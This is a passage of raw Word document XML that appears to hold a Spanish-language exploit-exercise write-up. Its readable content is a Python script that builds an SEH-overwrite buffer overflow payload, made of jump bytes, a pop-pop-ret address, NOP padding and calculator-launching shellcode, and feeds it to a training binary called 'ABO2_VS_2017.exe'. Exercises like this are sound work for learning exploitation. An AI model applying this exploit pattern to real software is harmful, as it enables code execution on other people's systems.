                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d36363"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0x438</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">next_seh = b</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\xEB\x06\x90\x90"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">      # Un JMP para evitar pisar el seh </w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">current_seh = b</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x31\x12\x40\x00"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">   # Salta al pop pop ret</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">jmp_to_payload = b</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\xE9\xBB\xFB\xFF\xFF\x90"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> # Salta al payload</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">jmp_to_exit = b</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\xE9\xB1\x14\x26\x00\x90"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">  # JMP </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d36363"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">40102</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">C</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">buffer =  winexec_calc_shellcode </w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">buffer += jmp_to_exit + b</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x90"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> * (size_to_next_seh - len(winexec_calc_shellcode) - len(jmp_to_exit))</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">buffer += next_seh</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">buffer += current_seh</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">buffer += jmp_to_payload</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">buffer += b</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x90"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> * size_crash # Size para de desbordar la pila</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">payload = buffer</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">p1 = Popen(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"ABO2_VS_2017.exe"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stdin</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">=PIPE)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">print (</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"PID: %s"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> % hex(p1.pid))</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">print (</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"Enter para continuar"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">p1.communicate(payload)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">p1.wait()</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">input()</w:t>
            </w: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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2184400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14"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6.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.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5.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.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hyperlink" Target="https://docs.google.com/document/d/16KfjhfpA2nwyfT5xJQiRzf6uPMnBI2QqX99QjW2Y7oU/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId18"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